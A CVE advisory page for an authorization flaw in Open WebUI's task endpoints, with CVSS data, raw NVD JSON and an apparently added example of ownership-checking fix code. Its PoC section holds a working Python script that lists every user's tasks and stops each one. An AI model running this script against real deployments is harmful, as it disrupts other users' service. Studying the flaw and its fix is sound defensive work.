Security Vulnerability Report
CVE-2026-45399 CVSS 7.1 HIGH

Published: 2026-05-15 20:16:49
Last Modified: 2026-05-15 20:16:49

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user with low privileges can enumerate active background tasks across the system and stop tasks belonging to other users via the GET /api/tasks and POST /api/tasks/stop/{task_id} methods. This allows a casual user to disrupt system-wide chat usage by continuously canceling other users' active tasks. This is a real authorization vulnerability affecting integrity and usability in multi-user deployments. This vulnerability is fixed in 0.9.0.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Open WebUI < 0.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Configuration
target_url = "http://localhost:3000"  # Replace with actual target
auth_token = "LOW_PRIVILEGE_USER_TOKEN"  # Attacker's session token
headers = {
    "Authorization": f"Bearer {auth_token}",
    "Content-Type": "application/json",
}

# Step 1: Enumerate active tasks (IDOR vulnerability)
# This endpoint returns tasks for ALL users, not just the current one
enum_url = f"{target_url}/api/tasks"
response = requests.get(enum_url, headers=headers)

if response.status_code == 200:
    tasks = response.json()
    print(f"[+] Successfully enumerated {len(tasks)} tasks.")

    # Step 2: Stop tasks belonging to other users
    for task in tasks:
        task_id = task.get("id")
        # URL to stop a specific task
        stop_url = f"{target_url}/api/tasks/stop/{task_id}"
        # Exploit: Send POST request to stop the task
        # The server does not check if the current user owns this task_id
        exploit_resp = requests.post(stop_url, headers=headers)
        if exploit_resp.status_code == 200:
            print(f"[+] Successfully stopped task ID: {task_id}")
        else:
            print(f"[-] Failed to stop task ID: {task_id}")
else:
    print("[-] Failed to enumerate tasks.")
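The missing check itself, as an added Python example that is not Open WebUI's code: a hypothetical in-memory task store with the pre-fix "list everything" behaviour beside ownership-scoped listing and stopping, which is the CWE-862 fix pattern the advisory describes. The User, Task and TaskStore names, the "admin" role and the HTTP-style return codes are assumptions; the real Open WebUI models and handlers differ.

```python
"""Ownership-scoped task listing and stopping (added example, not Open WebUI code)."""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:          # hypothetical caller model
    id: str
    role: str = "user"   # "admin" may see and stop every task


@dataclass
class Task:          # hypothetical background task model
    id: str
    owner_id: str
    status: str = "running"


class TaskStore:
    def __init__(self, tasks):
        self._tasks = {t.id: t for t in tasks}

    def list_tasks_vulnerable(self, caller):
        # Pre-fix behaviour: every authenticated caller sees every task (CWE-862).
        return sorted(self._tasks)

    def list_tasks(self, caller):
        # Fixed: scope GET /api/tasks to the caller unless the caller is an admin.
        return sorted(t.id for t in self._tasks.values()
                      if caller.role == "admin" or t.owner_id == caller.id)

    def stop_task(self, caller, task_id):
        # Fixed: resolve the task, then enforce ownership BEFORE acting on it.
        # Returns an HTTP-style status: 404 unknown id, 403 not the owner, 200 stopped.
        task = self._tasks.get(task_id)
        if task is None:
            return 404
        if caller.role != "admin" and task.owner_id != caller.id:
            return 403
        task.status = "stopped"
        return 200

    def status(self, task_id):
        return self._tasks[task_id].status


# Constructed sample data: two users, one running task each, plus an admin.
STORE = TaskStore([Task("t-alice-1", "alice"), Task("t-bob-1", "bob")])
ALICE, BOB, ADMIN = User("alice"), User("bob"), User("root", role="admin")
```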

References

https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22 (GitHub Security Advisory)
CWE-862: Missing Authorization

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-45399",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-15T20:16:48.950",
    "lastModified": "2026-05-15T20:16:48.950",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, any authenticated user with low privileges can enumerate active background tasks across the system and stop tasks belonging to other users via the GET /api/tasks and POST /api/tasks/stop/{task_id} methods. This allows a casual user to disrupt system-wide chat usage by continuously canceling other users' active tasks. This is a real authorization vulnerability affecting integrity and usability in multi-user deployments. This vulnerability is fixed in 0.9.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-8jjp-r2w2-4v22",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}